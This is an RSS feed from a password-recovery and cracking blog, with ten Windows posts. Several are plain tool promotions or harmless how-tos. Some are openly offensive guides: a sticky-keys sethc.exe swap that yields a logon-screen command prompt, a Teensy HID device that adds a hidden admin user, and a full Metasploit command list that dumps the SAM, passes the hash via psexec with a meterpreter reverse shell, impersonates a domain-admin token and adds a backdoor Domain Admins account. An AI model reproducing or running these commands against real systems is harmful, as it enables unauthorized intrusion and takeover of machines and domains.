<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>What&#039;s My Pass? &#187; windows</title>
	<atom:link href="http://www.whatsmypass.com/category/windows/feed" rel="self" type="application/rss+xml" />
	<link>http://www.whatsmypass.com</link>
	<description>Password Recovery for Windows, Mac, Linux, browsers, email, instant messengers, BIOS</description>
	<lastBuildDate>Tue, 24 Jan 2012 16:08:10 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>The new threat</title>
		<link>http://www.whatsmypass.com/the-new-threat</link>
		<comments>http://www.whatsmypass.com/the-new-threat#comments</comments>
		<pubDate>Sat, 12 Feb 2011 17:58:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Apple]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1145</guid>
		<description><![CDATA[Programmable embedded devices have the capability of being detected as a HID device , just like a keyboard or mouse. So if you have physical access and a minute alone you can compromise a system with something the size of your thumb. The possibilities are endless, HTTP/FTP download, injecting binaries into debug or Powershell etc.. [...]]]></description>
			<content:encoded><![CDATA[<p>Programmable embedded devices have the capability of being detected as a HID device , just like a keyboard or mouse. So if you have physical access and a minute alone you can compromise a system with something the size of your thumb. The possibilities are endless, HTTP/FTP download, injecting binaries into debug or Powershell etc.. Also this device is cross platform which means Windows,Linux,UNIX and Apple are all vulnerable.</p>
<p>Here&#8217;s an example project we made for a Windows7 box that adds a new Admin user to the system and hides that user from the logon screen. the whole process takes about 16 seconds , with most of the time taken by the device being detected as a keyboard and the driver installed. The device costs about $20 and can be found <a href="http://www.pjrc.com/teensy/">here</a></p>
<p><center><iframe title="YouTube video player" width="475" height="390" src="http://www.youtube.com/embed/MyG3x7HHwwA" frameborder="0" allowfullscreen></iframe></center></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/the-new-threat/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>BitLocker password cracker</title>
		<link>http://www.whatsmypass.com/bitlocker-password-cracker</link>
		<comments>http://www.whatsmypass.com/bitlocker-password-cracker#comments</comments>
		<pubDate>Wed, 29 Sep 2010 16:28:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[cracking]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1086</guid>
		<description><![CDATA[Passware Inc. says it has come up with a way to access files on USB drives secured by the BitLocker encryption feature of Microsoft Windows. They announced this week the release of Passware Kit Forensic version 10.1. The vendor said its software now lets investigators recover BitLocker encryption keys and getting “full access” to the [...]]]></description>
			<content:encoded><![CDATA[<div id="postbody" style="display: block;">
<p style="margin: 0in 0in 0pt;"><a href="http://ref.lostpassword.com?13344" target="_blank">Passware Inc.</a> says it has come up with a way to access files  on USB drives secured by the BitLocker encryption feature of Microsoft Windows.</p>
<p style="margin: 0in 0in 0pt;">
<p style="margin: 0in 0in 0pt;">They announced this week the release of <a href="https://www.cleverbridge.com/156/cookie?affiliate=13344&amp;redirectto=http%3a%2f%2fwww.lostpassword.com%2fkit-forensic.htm&amp;product=35456" target="_blank">Passware Kit Forensic  version 10.1</a>. The vendor said its software now lets investigators  recover BitLocker encryption keys and getting “full access” to the  contents of encrypted disks.</p>
<p style="margin: 0in 0in 0pt;">
<p style="margin: 0in 0in 0pt;">Microsoft added its BitLocker hard-disk  encryption feature to the &#8220;ultimate&#8221; and &#8220;enterprise&#8221; versions of its  Windows Vista and Windows 7 operating systems, in response to greater  concern over data losses and breaches. It is also present in Windows Server 2008 and Windows Server 2008 R2.</p>
<p style="margin: 0in 0in 0pt;">
<p style="margin: 0in 0in 0pt;">Passware’s target market is law  enforcement, said the company’s marketing manager, Nataly Koukoushkina.</p>
<p style="margin: 0in 0in 0pt;">
<p style="margin: 0in 0in 0pt;">She  added users need physical access to computers in order to use Passware  to defeat BitLocker encryption.</p>
<p style="margin: 0in 0in 0pt;">
<p style="margin: 0in 0in 0pt;">“That’s not easy for hackers,” she  said. “We developed it for investigative purposes only.”</p>
<p style="margin: 0in 0in 0pt;">
<p style="margin: 0in 0in 0pt;">Passware  launched the tool at the a training conference held by the High  Technology Crime Investigation Association (HTCIA) in Atlanta.</p>
<p style="margin: 0in 0in 0pt;">
<p style="margin: 0in 0in 0pt;">The  <a href="https://www.cleverbridge.com/156/cookie?affiliate=13344&amp;redirectto=http%3a%2f%2fwww.lostpassword.com%2fkit-forensic.htm&amp;product=35456">software</a> costs US$795 and includes a year of free updates, Koukoushkina  said, adding the BitLocker feature of Windows stores the encryption keys  in a computer’s memory.</p>
<p style="margin: 0in 0in 0pt;">
<p style="margin: 0in 0in 0pt;">“We are using this vulnerability in order  to decrypt the BitLocker hard disk,” she said. “Now the enhancement is  for portable disk USB drives.”</p>
<p style="margin: 0in 0in 0pt;">
<p style="margin: 0in 0in 0pt;"><a href="http://ref.lostpassword.com?13344" target="_blank">Passware</a>, who says its customers  include the U.S. Department of Defense, makes software designed to  either recover or reset software for a variety of document types,  including <a href="https://www.cleverbridge.com/156/cookie?affiliate=13344&amp;redirectto=http%3a%2f%2fwww.lostpassword.com%2fkit-basic.htm&amp;product=39360" target="_blank">Adobe Acrobat</a>, plus Microsoft  <a href="https://www.cleverbridge.com/156/cookie?affiliate=13344&amp;redirectto=http%3a%2f%2fwww.lostpassword.com%2fkit-basic.htm&amp;product=39360" target="_blank">Word</a>,  <a href="https://www.cleverbridge.com/156/cookie?affiliate=13344&amp;redirectto=http%3a%2f%2fwww.lostpassword.com%2fkit-basic.htm&amp;product=39360" target="_blank">Excel</a> and <a href="https://www.cleverbridge.com/156/cookie?affiliate=13344&amp;redirectto=http%3a%2f%2fwww.lostpassword.com%2fkit-basic.htm&amp;product=39360" target="_blank">Access</a>.</p>
<p style="margin: 0in 0in 0pt;">
<p style="margin: 0in 0in 0pt;">The enterprise version will scan machines  for password-protected files and scan the physical memory image file for  disks encrypted with either BitLocker or TrueCrypt. If a TrueCrypt  volume is dismounted, then the <a href="http://ref.lostpassword.com?13344" target="_blank">Passware</a> software does a brute force  attack.</p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/bitlocker-password-cracker/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Windows Live Messenger Recovery</title>
		<link>http://www.whatsmypass.com/windows-live-messenger-recovery</link>
		<comments>http://www.whatsmypass.com/windows-live-messenger-recovery#comments</comments>
		<pubDate>Mon, 13 Sep 2010 03:47:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[windows]]></category>
		<category><![CDATA[USD]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1022</guid>
		<description><![CDATA[Windows Live Messenger (formerly MSN Messenger) is an instant messaging client created by Microsoft. As of June 2009 it had over 330 million active users. From version 8.0, Live Messenger stores your saved password in your Windows Credential record. Live Messenger Recovery can decrypt your saved passwords and display them in plaintext. Even if you [...]]]></description>
			<content:encoded><![CDATA[<p>Windows Live Messenger (formerly MSN Messenger) is an instant messaging client created by Microsoft. As of June 2009 it had over 330 million active users. From version 8.0, Live Messenger stores your saved password in your Windows Credential record. Live Messenger Recovery can decrypt your saved passwords and display them in plaintext. Even if you uninstall Live Messenger your username/password can be left behind in your Credentials store, allowing our app to still recover it. Works for versions 8.0 and above.<br />
<strong>Software Requirements</strong></p>
<ul>
<li>Processor: Pentium class or equivalent processor</li>
<li>RAM: 64MB RAM recommended</li>
<li>Hard Disk: 14kb free hard disk space</li>
<li>Supported Operating System: Windows 2k/2k3/XP/Vista/Win7</li>
</ul>
<p><strong>Trial and registration</strong></p>
<p align="justify">Evaluation version is available for FREE download. This unregistered (demo) software recovers only the first 3 characters in password (rest is shown as ‘*’).</p>
<p><center><br />
Download Live Recover Demo<br />
<a href="http://www.whatsmypass.com/downloads/LiveRecover"><img src="http://whatsmypass.com/download.jpg"></a><br />
689 downloads</center></p>
<p style="text-align: center;"><strong><em>In order to display full Password you should register for licensed Software.<br />
Only $4.99!! All proceeds go to supporting this site!</em></strong></p>
<table style="height: 75px;" border="0" width="463">
<tbody>
<tr>
<td style="text-align: center;" valign="top"><a href="http://1626765-USD4.99.e-gold.com" target="_top"><img src="http://www.e-gold.com/gif/paywith.gif" border="0" alt="Pay Now with e-gold..." /></a></td>
<td>
<form style="text-align: center;" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input alt="PayPal - The safer, easier way to pay online!" name="submit" src="https://www.paypal.com/en_US/i/btn/x-click-but06.gif" type="image" /> <img src="https://www.paypal.com/en_US/i/scr/pixel.gif" border="0" alt="" width="1" height="1" /></p>
<input name="cmd" type="hidden" value="_xclick-subscriptions" />
<input name="business" type="hidden" value="sales@whatsmypass.com" />
<input name="item_name" type="hidden" value="Live Recover 1.0" />
<input name="no_shipping" type="hidden" value="1" />
<input name="no_note" type="hidden" value="1" />
<input name="currency_code" type="hidden" value="USD" />
<input name="lc" type="hidden" value="US" />
<input name="bn" type="hidden" value="PP-SubscriptionsBF" />
<input name="a3" type="hidden" value="4.99" />
<input name="p3" type="hidden" value="1" />
<input name="t3" type="hidden" value="Y" />
<input name="sra" type="hidden" value="1" /> </form>
</td>
</tr>
</tbody>
</table>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/windows-live-messenger-recovery/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Change your password with sticky keys</title>
		<link>http://www.whatsmypass.com/change-your-password-with-sticky-keys</link>
		<comments>http://www.whatsmypass.com/change-your-password-with-sticky-keys#comments</comments>
		<pubDate>Wed, 18 Aug 2010 22:56:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[Internet Explorer Passwords]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[operating system]]></category>
		<category><![CDATA[Windows 7]]></category>
		<category><![CDATA[Windows PE]]></category>
		<category><![CDATA[Windows Vista]]></category>
		<category><![CDATA[Windows XP]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=1007</guid>
		<description><![CDATA[Forgot the administrator password? There are many ways to access a Windows installation if you forgot the administrator password. Today I’ll show you another procedure to reset the Windows password by replacing the Sticky Keys application. This program allows you to use the function keys SHIFT, CTRL, ALT, or the Windows key by typing one [...]]]></description>
			<content:encoded><![CDATA[<p>Forgot the administrator password? There are many ways to access a Windows installation if you forgot the administrator password. Today I’ll show you another procedure to reset the Windows password by replacing the Sticky Keys application. This program allows you to use the function keys SHIFT, CTRL, ALT, or the Windows key by typing one key after the other instead of pressing them simultaneously with the second key. The main advantage of this password reset method is that you don’t need third-party software; another plus is that it is easy to carry out because no Registry hack is required, as when you offline enable the built-in administrator.</p>
<p>Please note that resetting the password from an account other than  the corresponding user account always means that the user loses the  credentials stored in the Windows  Vault, stored  Internet Explorer passwords, and files that you encrypted with the  Encrypting File System (EFS). Of course, if you have a backup of these  credentials, you can restore them; likewise, if you have exported the  private EFS key, you can import it again after you have reset the  password.</p>
<p>Like with all other solutions that allow you to reset the Windows  password without having an account on the corresponding computer, you  have to boot from a second operating system and access the Windows  installation while it is offline.</p>
<p>You can do this with a bootable  Windows PE USB stick or by using Windows RE. You can start Windows  RE by booting the Windows Vista or Windows 7 setup DVD and then  selecting “Repair” instead of “Install Windows.”</p>
<p> By the way, you can’t use the Windows XP boot CD for this purpose  because its Recovery Console will ask for a password for the offline  installation. However, you can use a Vista or Windows 7 DVD to reset a  forgotten Windows administrator password on Windows XP.</p>
<p>This works because Windows RE, which is based on Vista or Windows 7,  will let you launch a command prompt with access to an offline  installation without requiring a password.<br />
<span id="more-1007"></span></p>
<h2>To reset a forgotten administrator password, follow these steps:</h2>
<ol>
<li>Boot from Windows PE or Windows RE and access the command prompt.</li>
<li>Find the drive letter of the partition where Windows is installed.  In Vista and Windows XP, it is usually C:, in Windows 7, it is D: in  most cases because the first partition contains Startup Repair. To find  the drive letter, type C: (or D:, respectively) and search for the  Windows folder. Note that Windows PE (RE) usually resides on X:.</li>
<li>Type the following command (replace “c:” with the correct drive  letter if Windows is not located on C:):<br />
<strong>copy c:\windows\system32\sethc.exe c:\<br />
</strong>This creates a copy of sethc.exe to restore later.</li>
<li>Type this command to replace sethc.exe with cmd.exe:<br />
<strong>copy /y c:\windows\system32\cmd.exe  c:\windows\system32\sethc.exe</strong></li>
<li>Reboot your computer and start the Windows installation where you  forgot the administrator password.</li>
<li>After you see the logon screen, press the SHIFT key five times.</li>
<li>You should see a command prompt where you can enter the following  command to reset the Windows password (see screenshot above):<br />
<strong>net user <em>you_user_name new_password<br />
</em></strong>If you don’t know your user name, just type <strong>net  user </strong>to list the available user names.</li>
<li>You can now log on with the new password.</li>
</ol>
<p>I recommend that you replace sethc.exe with the copy you stored in  the root folder of your system drive in step 3. For this, you have to  boot up again with Windows PE or RE because you can’t replace system  files while the Windows installation is online.</p>
<p>Via: <a href="http://4sysops.com/archives/forgot-the-administrator-password-the-sticky-keys-trick/">4sysops.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/change-your-password-with-sticky-keys/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Kon Boot 1.1</title>
		<link>http://www.whatsmypass.com/kon-boot-1-1</link>
		<comments>http://www.whatsmypass.com/kon-boot-1-1#comments</comments>
		<pubDate>Mon, 10 May 2010 09:08:13 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[cracking]]></category>
		<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[kon-boot]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[USD]]></category>
		<category><![CDATA[Windows 7]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=935</guid>
		<description><![CDATA[We reviewed Kon Boot 1.0 last year HERE which was a great breakthrough program that allowed you to boot into a Windows machine and bypass the logon screen without entering a password. To accomplish this, Kon Boot hooks the bios on the fly subverting the Windows kernel authentication temporarily and allowing you access. Since this [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://img718.imageshack.us/img718/1199/konboot11.png" alt="Kon Boot 1.1" /><br />
We reviewed Kon Boot 1.0 last year <a href="http://www.whatsmypass.com/bypass-windows-logon-password">HERE</a> which was a great breakthrough program that allowed you to boot into a Windows machine and bypass the logon screen without entering a password. To accomplish this, Kon Boot hooks the bios on the fly subverting the Windows kernel authentication temporarily and allowing you access. Since this is a temporary process the computer is back to normal when you reboot. This allowed you to access the computer without having to take the time to reset the password or crack it, and it left the computer untouched. Now, a year later, Kon Boot v1.1 has been released with new features, such as booting from floppy,CD, or usb, privilege escalation support which allows you to gain SYSTEM privileges from ANY account on the system. For example, you can boot from Kon Boot and log in as Guest and run &#8216;Net User&#8217; command to add a new user,reset admin passwords etc as SYSTEM </p>
<p>It also has a bunch of new bug fixes/updates.</p>
<ol>
<li>- Added 64-bit environment support</li>
<li>- Added USB support tools (grldr, klmemusb)</li>
<li>- Added debugging code to make it easier to track down various compatibility problems</li>
<li>- Fixed bug in Windows 7 support failures</li>
<li>- Removed Linux support</li>
<li>- Many performance improvements to source code</li>
<li>- Improved BIOS support by reducing code size significantly</li>
</ol>
<p>Unfortunately it is no longer free. But for a meager price of $15.99 for a personal license, it gives you free updates and support for a period of 6 months. You can still use it without restrictions after that period.<br />
They also offer a commercial license, for $75.99 with 1 year of support and updates, allowing you to use on business environment.<br />
To purchase Kon Boot v1. 1,visit their website <a href="http://www.kryptoslogic.com/?area=2&#038;item=2">http://www.kryptoslogic.com</a></p>
<p>We are also giving away 10 personal licenses this week to some lucky readers!!! More details to come!!!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/kon-boot-1-1/feed</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
		<item>
		<title>DPAPIck &#8211; Recover offline passwords</title>
		<link>http://www.whatsmypass.com/dpapick-recover-offline-passwords</link>
		<comments>http://www.whatsmypass.com/dpapick-recover-offline-passwords#comments</comments>
		<pubDate>Tue, 06 Apr 2010 20:08:14 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Password Info]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[API]]></category>
		<category><![CDATA[forensic tool]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Internet Explorer form passwords]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[MSN Messenger]]></category>
		<category><![CDATA[WEP]]></category>
		<category><![CDATA[wireless network keys;]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/dpapick-recover-offline-passwords</guid>
		<description><![CDATA[This is a forensic tool to deal, in an offline way, with Microsoft Windows® protected data, using the DPAPI (Data Protection API). A non-exhaustive list of those recoverable secrets are : * EFS certificates * MSN Messenger credentials * Internet Explorer form passwords * Outlook passwords * Google Talk credentials * Google Chrome form passwords [...]]]></description>
			<content:encoded><![CDATA[<p>This is a forensic tool to deal, in an offline way, with Microsoft Windows® protected data, using the DPAPI (Data Protection API).<br />
A non-exhaustive list of those recoverable secrets are :</p>
<p>* EFS certificates<br />
* MSN Messenger credentials<br />
* Internet Explorer form passwords<br />
* Outlook passwords<br />
* Google Talk credentials<br />
* Google Chrome form passwords<br />
* Wireless network keys (WEP key and WPA-PMK)<br />
* Skype credentials</p>
<p>Of course you need to know the user&#8217;s current password, you can recover it from the SAM.<br />
<a href="http://www.dpapick.com/files/DPAPIck.zip">Download Here</a><br />
You can also read an excellent article on the undocumented process of recovering DPAPI passwords <a href="http://www.bursztein.net/wp-content/uploads/2010/03/dpapi.pdf">here</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/dpapick-recover-offline-passwords/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>How to own a Windows Domain 2.0</title>
		<link>http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0</link>
		<comments>http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0#comments</comments>
		<pubDate>Sat, 20 Feb 2010 16:42:22 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Administrator]]></category>
		<category><![CDATA[Domain Admins]]></category>
		<category><![CDATA[domain server]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[net]]></category>
		<category><![CDATA[Windows Server]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0</guid>
		<description><![CDATA[Back in October we showed you a video on how to own a Windows domain by passing the hash from the local admin account to the domain server to add a new domain admin account. This newer version makes the task much easier using Backtrack4 and metasploit. The commands used in the video: mount /dev/sda1 [...]]]></description>
			<content:encoded><![CDATA[<p>Back in October we showed you a <a href="http://www.whatsmypass.com/how-to-own-a-windows-domain">video</a> on how to own a Windows domain by passing the hash from the local admin account to the domain server to add a new domain admin account. This newer version makes the task much easier using Backtrack4 and metasploit.<br />
<center><br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="344" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="425" height="344" src="http://www.youtube.com/v/fIQQD193Hvc&amp;color1=0xb1b1b1&amp;color2=0xcfcfcf&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></center><br />
<span id="more-861"></span><br />
<code><br />
The commands used in the video:</p>
<p>mount /dev/sda1 /mnt/sda1<br />
cd /mnt/sda1/WINDOWS/system32/config<br />
samdump2 system SAM<br />
msfconsole<br />
use windows/smb/psexec<br />
exploit -p windows/meterpreter/reverse_tcp -o LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123...:5654... -j<br />
sessions -i 1<br />
use incognito<br />
list_tokens -u<br />
impersonate_token mydomain\\domainadmin<br />
execute -f cmd.exe -i -t<br />
net user hack MPass5678 /add /domain<br />
net group "Domain Admins" hack /add /domain<br />
PWNED <img src='http://www.whatsmypass.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
</code><br />
Lessons learned :<br />
1. never reuse admin passwords, even if they are technically unbreakable<br />
2. everything is a lot easier with the right tools.</p>
<p>Attack is compatible with WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/how-to-own-a-windows-domain-2-0/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to View Your Windows 7 Homegroup Password</title>
		<link>http://www.whatsmypass.com/how-to-view-your-windows-7-homegroup-password</link>
		<comments>http://www.whatsmypass.com/how-to-view-your-windows-7-homegroup-password#comments</comments>
		<pubDate>Thu, 03 Dec 2009 19:42:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Password Info]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[home network]]></category>
		<category><![CDATA[HomeGroup]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[Sharing Center]]></category>
		<category><![CDATA[View Your Windows 7 Homegroup]]></category>
		<category><![CDATA[Windows 7]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=818</guid>
		<description><![CDATA[If you have forgot your Windows 7 homegroup password, then this will show you how to view or print it to see what it is again. You must have this password to be able to join a computer to your homegroup. HomeGroup makes it easy to share pictures, music, documents, videos, and printers with other [...]]]></description>
			<content:encoded><![CDATA[<p> 	If you have forgot your Windows 7 homegroup password, then this will show you how to view or print it to see what it is again. You must have this password to be able to join a computer to your homegroup. </p>
<blockquote><p> 	HomeGroup makes it easy to share pictures, music, documents, videos, and printers with other people on your home network. You would have had to created a homegroup first before you will have a password to use to join other computer to your homegroup.</p></blockquote>
<p>1. Open the Control Panel (all items view), and click on the Network and Sharing Center icon.<br />
2. Click on the Choose homegroup and sharing options link.<br />
3. Click on the View or print homegroup password link.<br />
4. Write down this password down, or click on Print this page to print the passoword. When done, close this window. </p>
<p>NOTE: The password is case sensitive, so it will need to be typed exactly as it appears here when used to join a computer to the homegroup.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/how-to-view-your-windows-7-homegroup-password/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>How to own a Windows Domain</title>
		<link>http://www.whatsmypass.com/how-to-own-a-windows-domain</link>
		<comments>http://www.whatsmypass.com/how-to-own-a-windows-domain#comments</comments>
		<pubDate>Sun, 25 Oct 2009 17:34:05 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Privilege Escalation]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Microsoft Windows]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/how-to-own-a-windows-domain</guid>
		<description><![CDATA[Security tube has a nice video on how to gain domain admin access from a workstation using some simple tools http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx]]></description>
			<content:encoded><![CDATA[<p>Security tube has a nice video on how to gain domain admin access from a workstation using some simple tools</p>
<p><a href="http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx">http://securitytube.net/How-to-own-a-Windows-Domain-video.aspx</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/how-to-own-a-windows-domain/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>GetKey 3.0</title>
		<link>http://www.whatsmypass.com/getkey-3-0</link>
		<comments>http://www.whatsmypass.com/getkey-3-0#comments</comments>
		<pubDate>Sun, 13 Sep 2009 02:57:43 +0000</pubDate>
		<dc:creator>Dev Team</dc:creator>
				<category><![CDATA[Our Tools]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[Channel]]></category>
		<category><![CDATA[getkey]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Microsoft Vista]]></category>
		<category><![CDATA[Microsoft Windows]]></category>
		<category><![CDATA[mpc]]></category>
		<category><![CDATA[office key]]></category>
		<category><![CDATA[operating system]]></category>
		<category><![CDATA[RAM]]></category>
		<category><![CDATA[Software Requirements        Processor]]></category>
		<category><![CDATA[USD]]></category>
		<category><![CDATA[Windows 98]]></category>
		<category><![CDATA[windows key]]></category>
		<category><![CDATA[xp]]></category>

		<guid isPermaLink="false">http://www.whatsmypass.com/?p=745</guid>
		<description><![CDATA[GetKey 3.0 easily recovers Windows and Microsoft Office Product Keys. It also can recover the keys from a slaved/offline drive or run from a WindowsPE CD,such as BartsPE or Hiren&#8217;s BootDisk! It even decodes what type of Windows is installed on the offline drive by decoding the Microsoft Product Code and Channel ID, so if [...]]]></description>
			<content:encoded><![CDATA[<p>GetKey 3.0 easily recovers Windows and Microsoft Office Product Keys. It also can recover the keys from a slaved/offline drive or run from a WindowsPE CD,such as BartsPE or Hiren&#8217;s BootDisk!  It even decodes what type of Windows is installed on the offline drive by decoding the Microsoft Product Code and Channel ID, so if you have you&#8217;re a tech working on a dead system you can grab the right Windows CD to install. GetKey is written in pure assembly language, it&#8217;s fully portable and is only 14kb in size .<center></p>
<p style="text-align: center;">
<img src="http://www.whatsmypass.com/wp-content/uploads/2009/09/1.png" alt="1" title="1" width="375" height="256" class="aligncenter size-full wp-image-746" /><br />
<img src="http://www.whatsmypass.com/wp-content/uploads/2009/09/2.png" alt="2" title="2" width="375" height="256" class="aligncenter size-full wp-image-747" /></center></p>
<p><strong>Software Requirements</strong></p>
<ul>
<li>Processor: Pentium class or equivalent processor</li>
<li>RAM: 64MB RAM recommended</li>
<li>Hard Disk: 14kb free hard disk space</li>
<li>Supported Operating System: Windows 98/ME/NT/2000/2003/XP/Vista/Win7 *32bit only!</li>
</ul>
<p style="text-align: center;"><strong><em>We are offering this for only Only $4.99!! All proceeds go to supporting this site!</em></strong></p>
<table style="height: 75px;" border="0" width="463">
<tbody>
<tr>
<td>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
<input type="hidden" name="hosted_button_id" value="2T467F8XKKAKG">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_buynowCC_LG.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
<img alt="" border="0" src="https://www.paypal.com/en_US/i/scr/pixel.gif" width="1" height="1"><br />
</form>
</td>
<td style="text-align: center;" valign="top"><a href="http://1626765-USD4.99.e-gold.com" target="_top"><img src="http://www.e-gold.com/gif/paywith.gif" border="0" alt="Pay Now with e-gold..." /></a></td>
</tr>
</tbody>
</table>
<p style="text-align: left;">
]]></content:encoded>
			<wfw:commentRss>http://www.whatsmypass.com/getkey-3-0/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>

